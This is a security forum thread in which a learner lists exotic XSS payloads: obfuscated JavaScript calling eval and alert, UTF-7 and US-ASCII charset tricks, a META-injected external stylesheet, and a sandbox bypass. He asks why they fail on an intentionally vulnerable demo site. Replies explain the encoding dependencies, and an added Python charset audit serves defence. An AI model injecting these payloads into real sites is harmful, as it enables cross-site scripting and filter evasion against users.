Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
How to use these XSS injection vectors?
Posted by: rickm
Date: November 07, 2012 05:23AM

Hi all

I'm dedicated to learning XSS; I understand the basics and I'm learning more every day - thanks to this great forum and all of you guys.

Most of my tests are with Firefox 16.0.2 and this vulnerable test site (a site created intentionally to be vulnerable, for testing web issues):

http://demo.testfire.net/search.aspx?txtSearch=<script>alert(1)</script>

However, if you prefer any other site to give me a working example, no problem. :)

Over the last few days I have collected a set of XSS payloads that are very interesting; however, I'm unable to reproduce them and make the much-wanted alert box appear. Can you please take a look at them and let me know why they are not working on my target test site?

Case #01:

/./iiin({}) // Chrome only

Ref.: http://sla.ckers.org/forum/read.php?2,29090,page=12

I tested with the latest version of Chrome and it doesn't work. Is it really possible to generate an alert box? Or is it just a test that doesn't produce anything useful?

Case #02:

“<META HTTP-EQUIV=”Link” Content=”<http://ha.ckers.org/xss.css&gt;; REL=stylesheet”>”

Ref.: http://www.thespanner.co.uk/2007/10/01/xss-attacks-a-practical-example/

I tested with the latest version of Chrome and with my Firefox and it doesn't work. Can someone point out what's wrong? Also, is there a special way to encode it to make it work?

I tried it like this without success:

http://demo.testfire.net/search.aspx?txtSearch=“<META HTTP-EQUIV=”Link” Content=”<http://ha.ckers.org/xss.css&gt;; REL=stylesheet”>”

http://demo.testfire.net/search.aspx?txtSearch=“><META HTTP-EQUIV=”Link” Content=”<http://ha.ckers.org/xss.css&gt;; REL=stylesheet”>”

http://demo.testfire.net/search.aspx?txtSearch=%E2%80%9C%3CMETA%20HTTP-EQUIV%3D%C3%A2%E2%82%AC%C2%9DLink%C3%A2%E2%82%AC%C2%9D%20Content%3D%C3%A2%E2%82%AC%C2%9D%3Chttp%3A%2F%2Fha.ckers.org%2Fxss.css%26gt%3B%3B%20REL%3Dstylesheet%C3%A2%E2%82%AC%C2%9D%3E%E2%80%9D

Case #03:

I have seen many of these crazy payloads:

([],[][(![]+[])[+!![]+!![]+!![]]+([][([][[]]+[])[+!![]+!![]+!![]+!![]+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]+!![]+!![]+!![]+[]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]])()[([]+[][(![]+[])[+!![]+!![]+!![]]+([][([][[]]+[])[+!![]+!![]+!![]+!![]+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]+!![]+!![]+!![]+[]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]])[(+!![]+!![])+(+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])]+([]+[][(![]+[])[+!![]+!![]+!![]]+([][([][[]]+[])[+!![]+!![]+!![]+!![]+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]+!![]+!![]+!![]+[]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]])[(+!![]+!![])+(+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])]+([]+[][(![]+[])[+!![]+!![]+!![]]+([][([][[]]+[])[+!![]+!![]+!![]+!![]+[]]+([][[]]+[])[+!![]+!![]+!![]+!![]+!![]]+(![]+[])[+!![]+!![]]+(!![]+[])[+[]]+(![]+[])[+!![]+!![]+!![]+!![]+[]]+(!![]+[])[+!![]]]+[])[+!![]+!![]+!![]+!![]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]])[(+!![]+!![])+(+!![]+!![]+!![]+!![]+[])]+(![]+[])[+!![]+!![]]]('alert(1)')

OR

+[+[+[]==+[]][+[]]+[[[]+[][+[]]][+[]][+[+[]==+[]][+[]]+[+[]==+[]][+[]]+[+[]==+[]][+[]]]+[]+[+[+[]==+[]][+[]]]+[+[+[]==+[]][+[]]]+[+[+[]==+[]][+[]]]+[+[+[]==+[]][+[]]]]]

However, it doesn't work - I'm pretty sure that I'm missing something to make it work. I tested on the latest versions of Chrome and Firefox on the test site with encoding, adding a <script> tag, etc., and nothing. Can someone please give me a working example? I guess there should be a generic way to test it, such as we do with <script>alert(1)</script>, right?

Case #04:

Another very weird XSS payload; it never worked in my tests with the environment previously described.

<@uni>b=<@/uni>/\u/<@uni>[-1]<@/uni><@uni>z=<@/uni>/00/<@uni>[-1]<@/uni><@uni>c=<@/uni>/c/<@uni>[-1]<@/uni><@uni>e=0[<@/uni>'<@hex>ev<@/hex><@oct>al<@/oct>'<@uni>](<@/uni>'<@oct>b+z+61+b+z+6+c+b+z+65+b+z+72+b+z+74+b+z+28+b+z+31+b+z+29<@/oct>'<@uni>)<@/uni><@uni>0[<@/uni>'<@oct>ev<@/oct><@hex>al<@/hex>'<@uni>](e)<@/uni>

Is it real? Has someone got it working? How? Can you please give me an example?

Case #05:

These are payloads where you are in theory able to change the content-type, define it as UTF-7 and inject the payloads with Unicode or even non-alpha characters. Some payloads that I found use <head> before the meta tag; however, none of them work. I tried URL-encoding, injecting a <script> tag before, etc. I think they are very, very specific or I'm missing something.

<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">this['docum'+([][+[]]+[])[!+[]+!![]+!![]]+([][+[]]+[])[+!![]]+(!![]+[])[+[]]][({}+[])[!+[]+!![]+!![]+!![]+!![]]+({}+[])[+!![]]+({}+[])[+!![]]+'\x6b\x69\x65']

<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">'\u005c\u0075\u0030\u0030\u0036\u0031\u005c\u0075\u0030\u0030\u0036\u0063\u005c\u0075\u0030\u0030\u0036\u0035\u005c\u0075\u0030\u0030\u0037\u0032\u005c\u0075\u0030\u0030\u0037\u0034\u0028\u0031\u0029'.replace(/\u005c\u0075\u0030\u0030\u0036\u0031\u005c\u0075\u0030\u0030\u0036\u0063\u005c\u0075\u0030\u0030\u0036\u0035\u005c\u0075\u0030\u0030\u0037\u0032\u005c\u0075\u0030\u0030\u0037\u0034\u0028\u0031\u0029/,\u0065\u0076\u0061\u006c)</head>

<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">2BIBoAxAPAACU-tag+style%2BAD0AIg-xss%3Aexpression%28alert%286%29%29%2BACI-+%2BIBoAxCIr-

Can you please give a working example?

Case #06: - OK, I promise, this is the last one :-)

This one uses some kind of strange charset and never worked here either. I have no idea how to encode it, because URL-encoding it doesn't produce an alert box.

“¼script¾alert(¢XSS¢)¼/script¾”

As I said at the beginning, please feel free to test all of them on the test website (http://demo.testfire.net/search.aspx?txtSearch=InjectHere) and let me know if you were able to reproduce any of them. Also, if you prefer to use any other test site, no problem. Maybe there is some requirement on the vulnerable script that is not present in this test site?

As you can see, I'm very curious about these strange and weird XSS vectors. I would love to see them working, but I was unable to myself, so I'm asking for your help, sla.ckers masters.

Thanks.

Re: How to use these XSS injection vectors?
Posted by: Albino
Date: November 08, 2012 02:35PM

First of all, to gain a solid understanding of XSS I recommend http://lcamtuf.coredump.cx/tangled/. I think that will help more than disconnected examples. But, since you asked, I'll try to answer from memory:

Case #01:
Look at the first page of the thread; this is a bypass of Gareth's JSReg sandbox. http://sla.ckers.org/forum/read.php?2,29090,page=1

Case #02 and #05 and #06:
These all require unusual encodings. As you noticed, <meta> tags can be used to define encodings. However, encodings are normally defined in the HTTP response headers - use an intercepting proxy like Burp to see these. Headers generally take precedence over HTML, so a <meta> encoding tag may be overridden by a header.

I'm not the right person to answer #03 and #04.

Many of the weirder vectors you see here will rely on browser peculiarities, which may change at any time.

For a maintained list of practically useful vectors, see http://html5sec.org/

Also relevant is http://shazzer.co.uk/home . The first tests created at the bottom of the list on http://shazzer.co.uk/vectors are particularly interesting.

-------------------------------------------------------
Research blog

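The encoding point in the answer above, as an added example written for this thread rather than code from any of the posts: a small audit of an HTTP response that reports whether the character set is fixed by the Content-Type header, whether a `<meta>` tag is trying to declare a different one, and what the bytes look like once decoded the way a browser honouring that charset would read them. The function names, the `RISKY_CHARSETS` set and every sample header and body are constructed for illustration; the `<meta>` line reused in the demo is the one quoted in Case #05.

```python
import re
from typing import Dict, List, Optional

# Charsets that legacy browsers have let attackers use to smuggle markup past
# filters working on the raw bytes (constructed list for this example).
RISKY_CHARSETS = {"utf-7", "us-ascii"}

# Matches both <meta charset="..."> and
# <meta http-equiv="Content-Type" content="text/html; charset=...">.
_META_RE = re.compile(
    r"<meta\b[^>]*?charset\s*=\s*[\"']?\s*([A-Za-z0-9_.:-]+)", re.IGNORECASE
)


def header_charset(headers: Dict[str, str]) -> Optional[str]:
    """Charset parameter of the Content-Type header, lower-cased, or None."""
    for name, value in headers.items():
        if name.lower() == "content-type":
            m = re.search(r"charset\s*=\s*[\"']?([A-Za-z0-9_.:-]+)", value, re.I)
            return m.group(1).lower() if m else None
    return None


def meta_charsets(body: str) -> List[str]:
    """Every charset a <meta> tag in the body tries to declare, lower-cased."""
    return [m.group(1).lower() for m in _META_RE.finditer(body)]


def audit_charset(headers: Dict[str, str], body: str) -> List[str]:
    """Findings about who decides the page's encoding; empty list means fine.

    The header is checked first because browsers honour it over <meta>; when
    it is silent, the markup (or content sniffing) gets to choose.
    """
    findings = []
    hdr = header_charset(headers)
    metas = meta_charsets(body)
    if hdr is None:
        findings.append("Content-Type header has no charset; <meta> or sniffing decides the encoding")
        for cs in metas:
            if cs in RISKY_CHARSETS:
                findings.append(f"<meta> selects risky charset {cs} and nothing overrides it")
    else:
        if hdr in RISKY_CHARSETS:
            findings.append(f"header declares risky charset {hdr}")
        for cs in metas:
            if cs != hdr:
                findings.append(f"<meta> charset {cs} is normally overridden by header charset {hdr}")
    return findings


def as_browser_sees(body_bytes: bytes, charset: str) -> str:
    """Decode the response the way a browser honouring `charset` would.

    Python's own codec handles utf-7. For us-ascii we mimic the legacy
    behaviour of dropping the high bit, which is what made bytes 0xBC and
    0xBE render as '<' and '>' in the old US-ASCII vector. Other charsets go
    through the standard codec with undecodable bytes replaced.
    """
    if charset == "us-ascii":
        return bytes(b & 0x7F for b in body_bytes).decode("ascii")
    return body_bytes.decode(charset, errors="replace")


def markup_hidden_by_charset(body_bytes: bytes, charset: str) -> bool:
    """True when a <script tag is absent from the raw bytes but present after
    charset-aware decoding: the case a byte-level filter misses."""
    raw = body_bytes.decode("latin-1").lower()
    decoded = as_browser_sees(body_bytes, charset).lower()
    return "<script" not in raw and "<script" in decoded


if __name__ == "__main__":
    # Constructed response: header without charset, body carrying the Case #05 meta tag.
    sample_headers = {"Content-Type": "text/html"}
    sample_body = '<META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"><p>hello</p>'
    for finding in audit_charset(sample_headers, sample_body):
        print("-", finding)
    # Constructed bytes: the Case #06 shape, 0xBC ... 0xBE around "script".
    print(markup_hidden_by_charset(b"\xbcscript\xbe", "us-ascii"))
```

The practical rule the audit encodes is the one from the answer: set the charset explicitly in the Content-Type header so that a `<meta>` tag injected into the body has nothing to decide, and run any markup filter on the text as the browser will decode it rather than on the raw bytes.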
Re: How to use these XSS injection vectors?
Posted by: rickm
Date: November 14, 2012 04:18AM

Hi Albino

Thanks for your answer, very much appreciated.

I will take a closer look at this book that you are referencing.

This http://html5sec.org/ is nice.

The other site (http://shazzer.co.uk/vectors) provides a lot of examples, but most of them do not look as exotic as the ones that I referenced. If you know other sites with a list of exotic XSS, please let me know.

Thanks.

Re: How to use these XSS injection vectors?
Posted by: Albino
Date: November 24, 2012 06:01AM

Take a closer look at shazzer - most of the vectors have a single exotic character. By chaining together a few different ones you could create something pretty interesting.

https://twitter.com/XSSVector has some good tricks too.

-------------------------------------------------------
Research blog
